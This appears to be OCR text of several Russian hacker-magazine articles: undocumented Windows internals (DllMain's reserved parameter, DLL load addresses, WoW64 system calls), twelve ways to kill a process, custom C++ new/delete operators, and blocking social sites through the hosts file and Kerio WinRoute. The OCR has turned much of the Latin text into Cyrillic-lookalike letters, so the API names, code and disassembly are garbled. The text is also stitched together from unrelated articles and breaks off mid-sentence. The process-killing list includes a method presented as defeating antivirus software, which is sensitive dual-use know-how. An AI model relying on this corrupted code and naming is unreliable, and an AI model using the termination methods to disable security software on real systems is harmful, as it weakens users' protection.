Всем нам известна точка входа при старте библиотек — ОиМаіп: 

ВООЬ ЖЫАРІ ВІ1Маіп( 

іп НІЫЗТАВСЕ МпзСВШ, 



іп ВШКВ (іѵѵКеазоп, 

іп ВРѴОІВ ІрКезегѵесі 

) ; 

Принимает она (точка входа) три параметра. С первыми двумя все 
понятно, но как быть с третьим? И действительно, зачем нужен этот 
параметр [рВезегѵесІ, если нигде в коде при инициализации библиотеки 
он больше не используется? Оказывается не все так просто, как пытает- 
ся это показать Міегозоб;. 

М50М утверждает, что этот параметр используется при загрузке/выгруз- 
ке библиотеки; в частности, при статических операциях библиотеки этот 
параметр содержит отличное от нуля значение. И, наоборот, при дина- 
мических операциях [рВезегѵесІ будет равным нулю. 

Открою страшную тайну: [рВезегѵесІ есть ничто иное, как указа- 
тель на контекст стартующего процесса, который грузит библиотеку! 
Подробности таковы: при старте нового потока ядро ставит его в 
очередь для исполнения в виде АРО — АзупсРгосесІигеОаи, который 
передается в функцию ЫгІпібаІігеТЬипк, который вызывается Місіи.сіи. 
Одним из параметров, который передается ІбгІпШаІігеТЬипк, является 
указатель на структуру СОМТЕХТ, которая описывает начальное состоя- 
ние потока — регистры, данные и т.п. После выполнения АРС, контроль 
передается ЕсІгІпібаІігеТЬипк. Раз уж исполнение нового потока начи- 
нается с вызова пІсІШЕсІгІпібаІігеТЬипк, то этой функции передается 
стартовый адрес, определенный функцией СгеаІеТЬгеасІ. Таким образом 
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Адреса загрузки пІсШ.сШ и кегпе132.сШ в процессах ехріогег.ехе и Нге^ох.ехе 



становится понятно (а уж под отладчиком — тем более!), 
что СгеаІеТЬгеасІ должен передать через АРС в вызов 
ЫгІпібаІігеТЬипк параметры старта процесса. 

Подведем итоги: в случае, если сІѵѵРеазоп равен 
РР0СЕ55_АТТАСН (при загрузке библиотеки), [рРезегѵеб 
равен МПЕЕ для динамической загрузки и поп-МПЕЕ для 
статической загрузки. 

В случае, если МѵѵРеазоп равен 0ЕЕ_РР0СЕ55_0ЕТАСН 
(при выгрузке библиотеки), [рРезегѵеб равен МНЕ при 
вызове ЕгееЕіЬгагу и при ошибке загрузки ОЕЕ, и поп- 
МПЕЕ — при окончании процесса. 

Зачем Місговоі"!: скрывать этот факт? На самом деле, я бы 
тоже его скрыл :). Подумай сам, сколько возможностей 
подмены контекста открывается при этом! Что? Ты никог- 
да не слышал о контексте процесса? И системный вызов 
ЗеіТЬгеабСопІехІ: тебе тоже ни о чем не говорит? Окей, 
рассмотрим. Во-первых, контроль над структурой СОМТЕХТ 
даст нам контроль над регистрами процессора. Все реги- 
стры процессора при старте указываются в структуре 
СОМТЕХТ (смотри описание этой структуры). Это могут быть 
ОЕВОО-регистры для контроля над определенным при- 
ложением или же установки перехватов вызовов функций. 
Или, кстати, установки флага ТЕ в регистре ЕЕЕА05 
Во-вторых, путем изменения [рВе5егѵеб->Еір можно изме- 
нить точку старта библиотеки. Эта особенность также может 
быть использована в определении версии 00, которая 
используется на целевой машине путем выбора точки входа 
в зависимости от версии 00. Незаменимое свойство для 
обеспечения переносимости кода, кстати. 

АНАЛОГИЧНЫЕ АДРЕСА ЗАГРУЗКИ ОН 

И действительно, если ты обращал внимание, такие 
библиотеки как пІбЕ.би, кегпеІЗЗ.бЕ и изегЗЗ.бЕ для всех 
процессов всегда загружаются по одному и тому системно- 
му адресу, хотя МісгозоГі: это никак не объясняет. Почему? 
Как ты знаешь, указанные библиотеки представляют 
программисту набор системных функций для работы с 
системой. К примеру, пІби.бЕ является самой важной из 
юзермодных библиотек. Она представляет собой своео- 
бразную заглушку для вызова системных сервисов. И она 
должна быть загружена по одному и тому же адресу именно 
по этой причине. Например, создание любого юзермод- 
ного потока всегда происходит через вызов функции 
п 1 :би!ЕбгІпі 1 :іа[І 2 еТЬипк. Функция п1:би!Кіи5егАрсОІ5ра1:сЬег 



нужна системе для того, чтобы поставить в очередь 
исполнение юзермодных асинхронных вызовов. Ядро 
операционной системы определяет адреса этих функций 
еще на стадии инициализации системы. И, так как ядро 
использует скэшированные указатели на эти функции 
(для быстродействия), пІби.бЕ уже не может быть загру- 
жена по другим адресам. КегпеІЗЗ.бЕ не может быть 
загружен по различным адресам, потому что большое 
количество предоставляемых этой библиотекой сервисов 
используются системой для кросспроцессовых инъекций 
кода. Например, кегпеІЗЗ.бЕ ответственна за обработчик 
событий консоли (что делает команда Сігі+С в консоли, 
помнишь?). Так как консоль могут запустить многие про- 
граммы, адрес обработчика СФІ+С должен быть одним и 
тем же. Ну а изегЗЗ.бЕ постоянно загружается по одно- 
му и тому же адресу по той простой причине, что она 
предоставляет кучу сервисов, используемых ѵѵіпЗЗк.зуз 
— драйвера, реализующего оконную подсистему ѴѴіпбоѵѵз. 
Указатели на эти функции ѵѵіпЗЗк.зуз получает через 
вызов МШзегІпШаигеСиепіРГпАггауз во время загрузки. 

ОДНОПОТОЧНОСТЬ? НЕ ТУТ-ТО БЫЛО! 

Часто ли ты используешь в своих программах отдельные 
потоки? Если программа простая, и ей не требуется обра- 
батывать большие массивы данных, вряд ли она для тебя 
будет многопотоковой. Но это только на первый взгляд. 
Потому что многие (если не все) ѴѴіп32-приложения на 
самом деле являются многопотоковыми программами, 
даже если их разработчик утверждает обратное. К приме- 
ру, при старте программы сервисом подсистемы С5Р55 в 
программе по умолчанию создается отдельный поток для 
обработки консольных событий типа СФІ+С/СігІ+Вгеак. 
Во-вторых, большинство ѴѴіп32-АРІ-функций для 
выполнения своего кода используют отдельные потоки. 
Например, вызов ѴѴЭААзупсОеШозіВуМате использует 
синхронный вызов деіЬозШупаппе в отдельном потоке, 
после чего возвращает результаты запрашивающему 
через оконные сообщения. 



РАЗНИЦА МЕЖДУ НАТИВНЫМИ Х86- 
Ш 



ВЕРСИЯМИ БИБЛИОТЕК И ИХ ѴѴ0ѴѴ64- 
АНАЛОГАМИ 



Механизм ѴѴоѵѵ64 включает в себя полный набор 32-бит- 
ных системных 6Е, реализующий ѴѴіп32 АРІ-функции 




> СІѴСІ 

На ВѴВ ты сможешь 
найти последнюю 
версию ѴѴіпВВО, 
незаменимого отлад- 
чика под ОС ѴѴіпбоѵѵз, 
а также кое-какой 
интересный код, ко- 
торый позволиттебе 
сделать свою систему 
более защищенной. 




НТТР://ѴѴѴѴѴѴ 

"■ Г 

> 1іпк5 

Для более конкретно- 
го изучения внутрен- 
ностей ОС ѴѴіпбоѵѵз 
обычных форумов 
недостаточно. 

Очень часто золотые 
крупинки можно 
отыскать в блогах 
системных програм- 
мистов, таких как 
уѵѵѵ\д/..аІех-Ш^^ 
сот или Ы:1:р://]00ги. 
ѵехіШит.огд . 
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СООІЫ6 




Архитектура ѵѵоѵѵб4 



Ідля их использования ѴѴо\л/64-программами). Так какова же разница 
между «нормальными» 32-битными сіи и их ѴѴоѵѵ64-версиями? 

На 64-битных версиях ѴѴіпбоѵѵз разницы между такими библиотека- 
ми нет — большинство би являют собой 32-битные копии с 32-бит- 
ной версии операционной системы. К примеру, ѴѴо\л/64- библиотека 
ѵѵ52_32.би на Ѵізіа х64 — тот же самый файл, что и 32-битная ѵѵ52_32. 
би на Ѵізіа х86. Вместе с тем, некоторые би отличаются очень значи- 
тельно, к примеру, піби.би. 

Если мы глянем сквозь призму отладчика на х86 версию піби.би, то 
легко сможем увидеть, что системный вызов уходит в ядро системы 
через так называемый ЗувІетСаиЗШЬ в структуре ЗЬагебІІзегОаІа: 

1к(і> и пДсіІІ ІЫДСІозе 
пСсіІІ ! 2ѵ^СІозе : 
тоѵ еах,3 0]т 

тоѵ есіх, о:Е:ЕзеЦ ЗІіагесіІІзегВаЦа ! ЗузДетСаІІЗСиЬ 
саіі дмогй рСг [есіх] 
геС 4 

В ѴѴоѵѵ64-версии піби картина разительно отличается. Вызов систем- 
ного сервиса происходит через поле по смещению ОхсО в 32-битной 
структуре ТЕВ (ТЬгеаб Епѵігоптепі: Віоск): 

1к(і> и пксііі ІЫкСІозе 

пСсіІІ ! 2ѵ\?СІозе : 

тоѵ еах,0С]т 

хог есх,есх 

Іеа есіх, [езр+4] 

саіі &іяог(1 рСг ІзЩОСОк] 

гек 4 

В свою очередь, раскрываем структуру ТЕВ и там по смещению ОхсО 
видим поле, помеченное как “ѴѴ0ѴѴ32Ве5егѵеб”: 

1к(1> (ік пксі1І!_ТЕВ 

+0x000 ЫкТіЬ : _ЫТ_ТІВ 

[зкір. . . ] 

+ 0х0с0 ШШ2Кезегѵе(1 : Ркг32 Ѵоісі 



Кстати, в качестве лирического отступления от темы хочу заметить, 
что если ты планируешь использовать 32-битные программы под 
ѴѴо\л/64, будь очень внимателен при использовании таких функций как 
ОеіТЬгеабСопІехі/ЗеіТЬгеабСопІехІ;, и вот почему. Данные функции 
требуют дополнительных привилегий при исполнении в контексте 
ѴѴоѵѵ64. В частности, им нужен доступ к данным ТНВЕАВ_ОиЕВУ_ 
ІМЕОВМАТІОМ. 

12 СПОСОБОВ ЗАВЕРШИТЬ ПРОЦЕСС 

Чтобы ты всегда мог выйти победителем из социалистического сорев- 
нования на тему «Кто знает больше способов грохнуть процесс», про- 
веденного в кругу друзей, любимый журнал заботливо подгоняет тебе 
целых 12 методов: 

1 ) Использовать функции ТегтіпаІеРгосезв или МіТегтіпаІеРгосевв — 
понятно без лишних слов, правда, они всегда перехватываются авера- 
ми для своей защиты; 

2 ) Использовать СгеаІеРеппоІеТЬгеаб с вызовом ЕхиРгосезз. Для этого 
тебе нужно будет найти адрес Ехі1:Ргосезз внутри того процесса, кото- 
рый ты хочешь завершить; 

3 ) Использовать комбинацию МЮиегуЗузІетІпЬтпаиоп или 1:оо[Ье[р32 
с вызовом ТегтіпаІеТЬгеаб ог МіТегтіпаІеТЬгеаб. Все предельно про- 
сто — находишь все потоки искомого процесса и завершаешь их вызо- 
вом ТегтіпаІеТЬгеаб (МіТегппіпаІеТЬгеаб); 

4 ) Вызвать МЮиегуВузІеппІпІогппаиоп или 1:оо[Ье[р32, после чего вызо- 
вом ЗеіТЬгеабСопІехІ: установить регистр ЕІРтак, чтобы он указывал на 
ЕхиРгосезз; 

5 ) В цикле от О до 4096 вызвать функцию ВирбсаІеНапбІе с параме- 
трами ТагдеіРгосезз и ТагдеіРгосеззНапбІе равными МЕІЕЕ, а Орбопз 
равным 0x1 . Это закроет если не все, то почти все хендлы открытого 
процесса. Что интересно — этот метод прекрасно действует против 
сложных программ и систем, типа антивирусов, однако не сможет грох- 
нуть поіераб.ехе; 

6 ) Довольно громоздкий способ — можно вызвать последовательно 
Сгеа1;ебоЬ0Ь]ес1;, АззідпРгосеззТобоЬ0Ь]ес1; и Тегтіпа1:ебоЬ0Ь]ес1;; 

7 ) Сложный способ, больше известный в среде дебаггеров — вызы- 
ваем последовательно Мі:Сгеа1:еВеЬидОЬ]ес1: для процесса, затем 
МЮеЬидАсиѵеРгосезз, после чего закрываем хендл дебаг-объекта 
(читай — процесса) вызовом СІозеНапбІе; 

8 ) Оригинальный способ — последовательно для всего региона памяти 
процесса вызываем ѴігІиаЮиегуЕх с параметром РА6Е_М0АССЕ55 и 
ѴігІиаІРгоІесіЕх. Процесс тихо умрет, когда все страницы памяти станут 
недоступными; 

9 ) Топорный способ — открываем память процесса ѴігІиаЮиегуЕх, 
после чего вызовом ѴѴгТеРгосеззМетогу начинаем писать в память 
процесса всякую нечитаемую фигню; 

10 ) Еще один оригинальный способ — до посинения вызывать 
ѴігІиаЮиегуЕх. Когда кончится память под выделение, процесс умрет 
сам; 

11) Ядерная функция — РзТегтіпаІеРгосезз (РзрТегтіпаІеРгосезз). Так 
как ядром она не экспортируется, вызвать ее можно только путем ска- 
нирования ядра на предмет определенной сигнатуры; 

12 ) Еще одна неэкспортируемая фукнция — 

РзрТегппіпаІеТЬгеабВуРоіпІег. Ищется в ядре аналогичным образом, 
путем сканирования памяти. 

Кстати, код, реализующий поиск и перехват 

РзрТегтіпаІеТЬгеабВуРоіпІег для защиты твоего процесса от убийства 
таким способом, ты сможешь найти на диске. 

ЗАКЛЮЧЕНИЕ 

Читать доки, бесспорно, очень полезно. Поскольку они — рулез. 
Однако практика показывает, что самые вкусности и сочные куски 
ОС часто бывают недокументированными, и разработчики ѴѴіпбоѵѵз 
очень неохотно раскрывают нам эти секреты. Но все тайное всегда 
становится явным. Так что дерзай! Удачного компилирования, и да 
пребудет с тобой Сила! 
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КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Правила кодинга на С++ для настоящих спецов 

С++ исконно СЧИТАЕТСЯ ГИБКИМ, НО СЛОЖНЫМ. ЯЗЫКОМ 
ПРОГРАММИРОВАНИЯ. ПОЧЕМУ? ПОТОМУ ЧТО ТАК ОНО И ЕСТЬ :). 

В ЭТОЙ СТАТЬЕ МЫ УЗНАЕМ ОБ ОПЕРАТОРАХ МЕѴѴ И ОЕІЕТЕ, О ТОМ, 
КАК ПИСАТЬ СОБСТВЕННЫЕ ПРОЦЕДУРЫ УПРАВЛЕНИЯ ПАМЯТЬЮ 
И КАК НЕ СОВЕРШИТЬ УЖАСНУЮ ОШИБКУ, ЗАНИМАЯСЬ ЭТИМ 
НЕЛЕГКИМ ДЕЛОМ. 



Многие кодеры, выбирая С++ в качестве основного языка для написа- 
ния своих программ, хотяттем самым добиться от них максимальной 
эффективности, как в плане потребления ресурсов, так и в плане скорости 
выполнения. Именно написаниесобственныхоператоров для работы с 
памятью дает та кую возможность. Конечно, в наше время, когда повсе- 
местно используются сборщики мусора (например, в ^аѵа или С#), сам по 
себе вызов специальных команд для выделения и освобождения памяти 
выглядит немного странно, но именно благодаря этим командам любой 
программист может значительно улучшить производительность своего 
кода. 

Для того, чтобы написать правильный код, который будет работать с памя- 
тью, надо понимать, какорганизованы процедуры управления этой самой 
памятью в С++. Также следует помнить о многопоточности и проблемах, 
связанных с ней. Куча — это модифицируемый глобальный ресурс, доступ 
к кото рому дол жен быть синхронизирован. Если игнорировать этот фа кт, 
то рано или поздно все сломается, и потом будет очень сложно разо- 
браться, в чем же собственно дело. Поэтомупри написании собственного 
менеджера памяти всегда надо помнить о возможности одновременного 
доступа к куче из разных потоков программы. 

Когда имеет смысл заменять 
пеѵѵисіеіеіе? 

Для начала давай разберемся, стоитли нам вообще писатьсобственные 
процедуры работы с памятью. Чаще всего пеѵѵ и сіеіеіе переписывают для 
того, чтобы обнаружитьтакназываемые ошибки применения. Ктаким 
ошибкам относятся, например, утечки памяти. Они могут случаться какиз- 
за простой невнимательности программиста, так и вследствие высокого 
уровня сложности структуры кода. Попросту говоря, для динамически 
выделенной памяти не всегда вызывается сіеіеіе. Бывает и другая край- 
ность, когда для одного и того же блока из кучи сіеіеіе вызывается два и 
более раз. В этом случае поведение программы предсказать невозможно. 
Всего этого можно избежать, если пользовательские функции по работе 



с кучей будут вести список выделенных блоков памяти. Еще одной часто 
встречающейся ошибкой применения является переполнение буфера. 
Сколько хакерскихатакбылоуспешно выполнено через та кую вот старую, 
какмир, дыру? Антагонист переполнения — это запись с адреса, предше- 
ствующего началу выделенного блока. Самописная версия пеѵѵ можетза- 
прашивать блоки большего размера и записывать в начало и конецтаких 
блоков специальную сигнатуру. Оператор сіеіеіе может проверять наличие 
этой сигнатуры и, если ее не окажется на месте, подниматьтревогу. 

Второй причиной, из-за которой можно смело переписывать процеду- 
ры управления памятью, является производительность. Стандартные 
версии операторов пеѵѵ и сіеіеіе, поставляемые вместе с компилятором, 
«слишком»универсальны. Они должны одинаково хорошо работать 
какдля кода, выполнение которого занимает меньше секунды, так и для 
программ, аптайм которых составляет месяцы. Эффективно выделять как 
несколько больших блоков памяти, которые существуют на протяжении 
всей работы программы, так и множество маленьких, которые «живут» 
сотые доли секунды. Стандартные функции работы с кучей должны уметь 
эффективно бороться с ее фрагментацией, поскольку даже если суммар- 
ный объем свободной памяти будет достаточно велик, высокая степеннее 
«раздробленности» может помешать выделению нужного блока. 

Теперь понятно, почему дефолтные пеѵѵ и сіеіеіе не всегда оказываются 
быстрыми и эффективными — используются слишком общие алгоритмы 
работы с памятью, которые призваны учесть все нюансы. В некоторых 
случаях написание собственных операторов работы с памятью помогает 
значительноускорить выполнение кода, а также уменьшить расход ресур- 
сов. Так, например, самой иен ые пеѵѵи сіеіеіе будут полезны для ускорения 
процесса распределения и освобождения памяти, дляуменьшения 
накладных расходов, характерных для стандартного менеджера памяти; 
чтобы компенсировать субоптимальное выравнивание в распределите- 
лях поумолчанию (об этом чуть ниже), чтобы сгруппировать взаимосвя- 
занные объекты друг с другом ит.д. 

Еще очень часто пеѵѵ и сіеіеіе переписывают для сбора статистики об 
используемой памяти. В высоконагруженных приложениях часто око- 
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Программирование — нелегкая штука, а на С++ — 
тем более 

зываются очень полезными знания отом, как используется память: как 
распределены выделяемые блоки по размерам, каково время ихжизни, 
какой порядок выделения и освобождения блоков характерен для кода, 
изменяется ли «потребление» динамической памяти на разных стадиях 
выполнения программы, и есть л и вообще какая-либо закономерность. 

На все эти вопросы помогут ответить собственные операторы работы с 
памятью. 

Пример собственной версии пеѵѵ 

Написать собственную версию операторов пеѵѵи б еіеіе достаточно про- 
сто. Рассмотрим, например, какможно реализовать глобальный оператор 
пеѵѵ с контролем записи за границами выделенного блока. Правда, в 
примере ниже есть несколько недостатков, но об этом далее. 

Пользовательская версия оператора пеѵѵ 

зСаСіс сопзС іпС зідпаСиге = ОхАВАВЕАЕА; 

СуресіеП ипзідпей сЬаг ВуСе; 

ѵоісі *орегаСог пеѵ^(зСсі: :зІ 2 е_Р зіге) 

Щтго^ (зСсі: :Ьасі_а11ос) 

{ 

изіпд патезрасе зСй; 

зІ 2 е_С геа13І2е = зІ 2 е + 2 * зІ 2 еоП(іпС) ; 
ѵоісі *рМет = таііос (геаІЗІ 2 е) ; 
іі ( ! рМет) 

Рітго^ (Ьасі_а11ос) ; 

* ( зСаРіс__саз1:<іпР>рМет) ) = зідпаРиге; 

* (геіпРегрге1:__сазС<іпР*> ( зРаРіс„сазС<ВуРе*> (рМет) 

+ геа13І2е — зІ 2 еоі(іп 1 :) ) ) = зідпаРиге; 

геСигп зРа1:іс_саз1:<ВуРе*> (рМет) + зІ 2 еоі(іпР) ; 

} 

Здесь мы сначала с помощью (функции таНос выделяем блокпамяти на 
два слова больше, чем запрашивается в передаваемом параметре, затем 
записываем сигнатуру в начало и в конец выделенного куска памяти, пос- 
ле чего возвращаем указатель на нее. 

Вроде все хорошо, но мы забываем отакой важной вещи, каквыравнива- 
ние. Многие компьютерные архитектуры требуют, чтобы данные опреде- 
ленныхтипов располагались в памяти по вполне конкретным адресам. 
Например, архитектура можеттребовать, чтобы указатели располагались 
по адресам, кратным четырем, а данные типа боиЫе были выровнены на 
границу двойного четырехбайтного слова. Если не соблюдать эти требо- 
вания, то возможны аппаратные сбои или замедление работы системы. 
С++ требует, чтобы все указатели, возвращаемые оператором пеѵѵ, были 




Отличная книга по стандарту С++ 

вы ровней ы для любого типа данных. Функция та Еос удовлетворяет 
этим условиям, но, поскольку мы записываем в начало блока сигнатуру, 
и, следовательно, возвращаем указатель, смещенный на длину этой 
сигнатуры, то нетникаких гарантий, что это безопасно. Если мы выделим 
память под переменную типа боиЫе на компьютере с архитектурой, где іпі: 
занимаетчетыре байта, то оператор пеѵѵ, приведенный в примере, скорее 
всего вернет неправильный указатель, что в итоге можетзавершиться 
аварийной остановкой программы или ее сильным замедлением. 
Надеюсь, теперь понятно, почему правильное выравниваниетакважно. 
Но не менее важным является требование коператорам пеѵѵ, согласно ко- 
торому все они должны включать цикл вызова функции-обработчика пеѵѵ. 

Функция-обработчик пеѵѵ 

Когда оператор пеѵѵ не можетудовлетворить запрос на выделение за- 
прошенного количества памяти, он возбуждает исключение. В старые 
времена оператор пеѵѵ возвращал ноль и следы подобного поведения 
сохранились в некоторых компиляторах и по сей день. Основная же масса 
современных компиляторов генерирует коде пеѵѵ, поддерживающим 
вызов исключений. 

Перед тем каквызвать исключение после неудачной попытки выделения 
памяти, оператор пеѵѵ должен выполнить код функции-обработчика (пеѵѵ- 
ЬапсІІег], которая определяется пользователем. Чтобы задать обработчик, 
нужно вызвать стандартную библиотечную функцию 5е1:_пеѵѵ_ЬапсІ[ег, 
объявленную в заголовочном файле <пеѵѵ> следующим образом: 

Объявление зеІ_пеѵѵ_Ьапсиег 

патезрасе зСсі { 

Цуресіеі ѵоісі ( *пеѵѵ_]тап(і1ег) () ; 
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Правильное оформление трюков — минус поло- 
вина багов 

пеѵ\?_1іапсі1ег зеІ:_пеѵ\[_}іапсі1ег (пеѵ7_1іап(і1ег р) 
і:Ъ.тоѵі ( ) ; 

} 

Как видно, пе\л/_Ьапс1[ег — это ІуресІеІ для указателя на функцию, 
которая не принимает никаких параметров, а 5е1;_пеѵѵ_ЬапсІ[ег — 
функция, которая как раз получает в качестве параметра перемен- 
ную типа пеѵѵ_ЬапсИег. Полученный указатель на функции впослед- 
ствии вызывается оператором пеѵѵ в случае неудачной попытки 
выделения памяти. Предыдущий указатель на обработчиктакже 
возвращается (5е1:_пеѵѵ_Ьапб[ег). В итоге можно получить пример- 
но следующий КОД: 

Использование зеІ_пеѵѵ_ИапсіІег 

ѵоій оиСОШетО 

{ 

зДсі: : сегг << "Невозможно выделить память\п"; 
зДсі: : аЬогС ( ) ; 

} 

іпЦ таіп ( ) 

{ 

зДсі: : зеЦ_пеѵ^_1іап(і1ег (оиСОШет) ; 

іпР *рВідВаСаАггау = пеѵ7 іпЦ [10000000 ОН] ; 

} 

Обработчик оператора пеѵѵ вызывается циклически, пока он не 
«сумеет» найти достаточное количество памяти или не выполнит какое- 
либо другоедействиедля корректной обработки ситуации. Найти свобод- 
ную память нетак-то просто, но можно пойти на небольшую уловку — 
в начале работы программы зарезервировать некоторый объем памяти и 
высвободить его при первом вызове обработчика. В результате таких дей- 
ствий следующая попытка выделить кусок памяти увенчается успехом. 
Альтернативным вариантом действий может быть установка другого об- 
работчика или вовсе его удаление. Если текущий пеѵѵ-ЬапбІегне может 
найти нужное количество свободной памяти, то, возможно, он знает 
какой-то другой обработчик, который справится с этой задачей лучше. 

А если с помощью 5е1:_пеѵѵ_ЬапсІ[егустановить нулевой указатель, то опе- 
ратор пеѵѵ сразу возбудит исключение при неудачной попытке выделения 
памяти. 

Также в функции-обработчике оператора пеѵѵ можно возбудить ис- 
ключение типа Ьаб_аиос или любого типа, унаследованного от него. 
Исключения такого типа не перехватываются в пеѵѵ, и поэтому их можно 



поймать в месте вызова оператора. Аеще можно вообще ничего не делать 
и завершить программу с помощью аЬогІ: или ехіі:, что, собственно, мы и 
сделали в примере. До этого момента мы все время говорили о глобаль- 
ной замене оператора пеѵѵ, но определитьспецифичный код выделения 
памяти можно лишьдля объектов определенного типа. Сделать это 
достаточно просто, нужно лишь в каждом классе написать свои версии 
5е1:_пеѵѵ_ЬапсІ[еги пеѵѵ. Определенная в классе 5еІ_пеѵѵ_ЬапсІ Іе г позво- 
лит пользователям задать обработчик пеѵѵ для класса, а принадлежащий 
классу орегаЬг пеѵѵ гарантирует, что при выделении памяти для объектов 
этого класса вместо глобального обработчика пеѵѵ будет использован тот, 
что определен в данном классе. 

Собственный пеѵѵ для класса 

сіазз ТДісідеД { 

риЫіс : 

зСаСіс зСсі: : пеѵѵ_1іапсі1ег зеЦ_пеѵѵ_}іап(і1ег 
(зДсі: : пеѵѵ_1іап(і1ег р) Сіігоѵѵ ( ) ; 
зДаСіс ѵоій *орегаДог пеѵѵ(зС(і: :зІ 2 е_Ц зіге) 

СІігохѵ(зЦсі: :Ьасі_а11ос) ; 

ргіѵаСе : 

зСаСіс зДсі: : пеѵ7_1іап(і1ег сиггепСНапсіІег ; 

} 

Оператор пеѵѵ, определенный в классе ѴѴібдеО должен отработать по 
вполне определенному алгоритму. Во-первых, он должен вызвать 
стандартный 5е1:_пеѵѵ_Ьапб[ег, указав в качестве параметра функцию- 
обработчик из класса ѴѴібдеЕ В результате этот пеѵѵ-ЬапбІег станет 
глобальным. Затем следует вызвать глобальный орегаЬгпеѵѵ. В случае 
ошибки будет вызван обработчик пеѵѵ, принадлежащий классу ѴѴібдеО 
Если это ни к чему не приведет, то глобальный пеѵѵ возбудит исключение, 
а пеѵѵ из класса должен восстановить исходный обработчик и распро- 
странить исключение. Еслиже выделение памяти прошлоудачно, то пеѵѵ, 
принадлежащий классу ѴѴі б деЕ должен вернуть указатель на эту память и 
восстановить предыдущий пеѵѵ-ЬапбІег. 

Правильный менеджер памяти 

Написать почти работающий менеджер памяти просто, а вот написать 
хорошо работающий менеджер в разы сложнее. Нужно учитывать массу 
нюансов. Во многих книгах по С++ приводятся примеры высокопроизво- 
дительного кода распределения памяти, но опускаются такие «скучные» 
моменты, какпереносимость, соглашения о выравнивании, безопасность 
относительно потоков и т.д. 

В большинстве случаев следуетхорошо подумать, прежде чем писать 
собственные процедуры работы с памятью. Некоторые современные 
компиляторы умеют протоколировать и отлаживать работу функций 
управления памятью. Можно найти множество коммерческих продуктов, 
позволяющихзаменить менеджер памяти, поставляемый компилятором. 
Такие продукты хорошо протестированы и практически не имеютошибок. 
И все же, если ни один из этих вариантов тебе не подошел, то советую, 
прежде чем заняться кодингом собственных пеѵѵ и беіеіе, заглянуть в 
ореп зоигсе проекты поуправлению памятью. Например, ознакомиться с 
библиотекой Рооі из проекта ВоозТ Там можно найти множество мелочей, 
которые позволят детально разобраться во всехтонкостяхуправления 
памятью в С++. 

Заключение 

Это была лишь небольшая часть того, что можно сказать об операторах 
пеѵѵи беіеіе. Надеюсь, в следующих статьях мы продолжим познавать 
тайны функций управления памятью. пг 
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Вход в социалки — 
на амбарный 
замок! 

ЕЩЕ НЕСКОЛЬКО СПОСОБОВ КОНТРОЛЯ ТРАФИКА И УПРАВЛЕНИЯ 
ДОСТУПОМ 

Рабочий день большинства юзеров начинается с просмотра сообидений 
в «Одноклассниках», чтения новостей и посеидения любых других ресур- 
сов, не связанных с выполнением своих служебных обязанностей. Не- 
которое время начальство смотрит на это сквозь пальцы, но в один пре- 
красный момент поступает команда: «Все блокировать!». 



ПОДРУЧНЫЕ СРЕДСТВА ѴѴІЫ00ѴѴ5 

Встроенный в последние версии ѴѴіпсіоѵѵз брандмауэр в режиме повы- 
шенной безопасности уже обладает достаточным функционалом, поз- 
воляющим заблокировать нужный порт и удаленный ІР-адрес для входя- 
щих и исходящих соединений. Очень удобно, что настройки абѵбігеѵѵаіі 
производятся не только в консоли ММС (локально ріли удаленно), но и 
посредством групповых политик. Так, в доменной среде можно приме- 
нять единые установки, которые автоматически устанавливаются и рас- 
пространяются с одной точки. Для решения поставленной задачи может 
подойти и пегзіі, поскольку он умеет управлять правилами встроенного 
брандмауэра и поддерживает возможность выполнения команд на 
удаленном хосте. Причем созданные в пеГзЬ профили можно экспорти- 
ровать в файлы с расширением *.\ѵЫ, а затем применить на все системы 
локальной сети. Нужно признать, что настройку абѵйгеѵѵаіі нельзя 
назвать прозрачной. Более того, блокировку по ІР лучше подкреплять 
запретом по ІЖІ, однако такой возможности разработчики не предус- 
мотрели. Хотя здесь вспоминаем, что ІЕ позволяет задать список сайтов, 
которые должны блокироваться: достаточно открыть браузер, щелкнуть 
в строке состояния в поле Безопасность, в окне настроек выбрать «Огра- 
ниченные узлы» и нажать кнопку «Узлы», чтобы добавить адреса. 

Еще один вариант блокировки сайтов — использование службы ПЫ5. 
Это может быть как сервер в локальной сети, который будет вьщавать 
неправрільные ІР на определенные сайты, так и файл Н05Т5 (обычно ле- 
жит по адресу с:\\Ѵіпсіоѵѵ8\5у8і:ет32\сігіѵег5\еГс\1іо5і:5) на клиентском 
компьютере. С последним вариантом все просто: 

127.0.0.1 осіпокіаззпікі . ги 

127.0.0.1 ѵллм. осіпокіаззпікі . ги 

То есть при запросе «Одноклассников» браузер получит адрес локаль- 
ной системы, и, по сути, запрос заблокируется. 

КЕКІОѴѴІМКОиТЕ 

в современных сетях для организации совместного доступа в интернет 
и защиты внутренней сети часто используется Кегіо ѴѴіпКоиіе, умею- 



щий блокировать любой трафик, определенный админом. В состав 
продукта включен целый ряд компонентов: файервол с функциями МАТ, 
прокси и ѴРМ-сервер, антивирусный модуль, распределение нагрузки, 
блокировка Р2Р-трафика и многое другое. Подробно о КѴѴЕ уже рас- 
сказывалось в статье «Марш-бросок в большую сеть», опубликованной 
в сентябрьском номере ] [ за 2007 год, поэтому остановимся лишь на 
функциях блокировки доступа к сайтам. 

Начнем с самого простого — фильтрации содержимого. Эта фича на- 
страивается при помощи простых правил во вкладке «Конфигурация - > 
Фильтрация содержимого». В КѴѴЕ включено несколько компонентов, 
при помощи которых задаются политики, позволяющие блокировать 
доступ к определенным ІЖІ по протоколам НТТР и РТР на основании 
шаблона. Шаблон адреса можно задать прямо в правиле фильтра- 
ции, но это неудобно. При наличии нескольких шаблонов, к которым 
необходимо применить одно действие, придется добавлять несколько 
правріл, что еще более усложняет процесс. Учитывая, что админ даже 
для небольшой сети формирует большое количество правил, придется 
потом долго искать нужное, если понадобится что-то изменить. Поэто- 
му переходим в «Определения - > Группы ІЛШ», где содержатся шаблоны 
ПКЕ, разбитые на группы. По умолчанию здесь четыре группы, назна- 
чение которых понятно из названия — Абз/Ьаппегз, БеагсЬ еп^іпез, 
АпШтагіс Прсіагез и ѴѴіпсіоѵѵз Прсіаге. Добавим свою группу. Нажимаем 
кнопку «Добавить», появляется окно, в котором заполняем название 
(например, Зосіаі пеіѵѵогк), выбираем тип (ПКЕ или Группа ІЖІ) и в 
поле адреса вписываем: 

осіпокіаззпікі . ги/ * 

Вносим еще одно правило в эту группу, чтобы перекрыть все варианты 
адреса: 

* . осіпокіаззпікі . ги/* 

И добавляем все адреса социальных сетей и других ресурсов, к которым 
нужно закрыть доступ. Не забываем про сайты, где публикуются зерка- 
